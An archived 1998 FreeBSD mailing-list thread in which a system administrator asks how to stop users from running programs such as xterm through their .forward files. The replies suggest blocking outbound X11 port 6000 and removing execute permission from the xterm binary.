From owner-freebsd-questions  Fri Dec  4 13:34:55 1998
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id NAA23394
          for freebsd-questions-outgoing; Fri, 4 Dec 1998 13:34:55 -0800 (PST)
          (envelope-from owner-freebsd-questions@FreeBSD.ORG)
Received: from dqc.org (dqc.org [12.7.119.10])
          by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA23389
          for <freebsd-questions@FreeBSD.ORG>; Fri, 4 Dec 1998 13:34:54 -0800 (PST)
          (envelope-from mkultra@dqc.org)
Received: from localhost (mkultra@localhost)
	by dqc.org (8.9.1a/dqc/OpenBSD) with ESMTP id NAA29361;
	Fri, 4 Dec 1998 13:38:50 -0800 (PST)
Date: Fri, 4 Dec 1998 13:38:50 -0800 (PST)
From: Keyser Soze <mkultra@dqc.org>
To: mike grommet <mgrommet@insolwwb.net>
cc: freebsd-questions@FreeBSD.ORG
Subject: Re: Advice on sendmail / execution of programs through .forward
In-Reply-To: <Pine.NEB.4.05.9812041327240.7918-100000@dqc.org>
Message-ID: <Pine.NEB.4.05.9812041338100.6051-100000@dqc.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

also, you could chagne the perms on the xterm binary to not allow
execution, for a very quick solution.

On Fri, 4 Dec 1998, Keyser Soze wrote:

> you can block access to port 6000 out (if you have a firewall). This will
> prevent the xterm from writing to XServers outside your firewall.
> 
> 
> On Fri, 4 Dec 1998, mike grommet wrote:
> 
> > Hi guys, I need some advice...
> > 
> > I block off shell access to my primary server...
> > however one of my users pulled a sneaky one.
> > 
> > He executed a xterm shell from his .forward and had it connect to his X
> > server on his personal PC... pretty slick actually, I have to give him that.
> > I never even considered it.
> > 
> > Well, naturally I am a bit concerned about this...
> > this particular user is quite benevolent, but what about next time?
> > 
> > I mean, it seems quite possible for a user to upload some sort of exploit
> > and an appropriate  .forward via ftp, send mail to himself and WHAM. Life
> > gets real bad.
> > 
> > Now, its quite convenient to be able to run programs from .forward, procmail
> > comes to mind immediately...
> > 
> > So what do you guys suggest to fix this problem the right way?
> > 
> > Mike Grommet
> > Unix Systems Adminstrator
> > Internet Solutions, Inc.
> > mgrommet@insolwwb.net
> > 
> > 
> > 
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-questions" in the body of the message
> > 
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message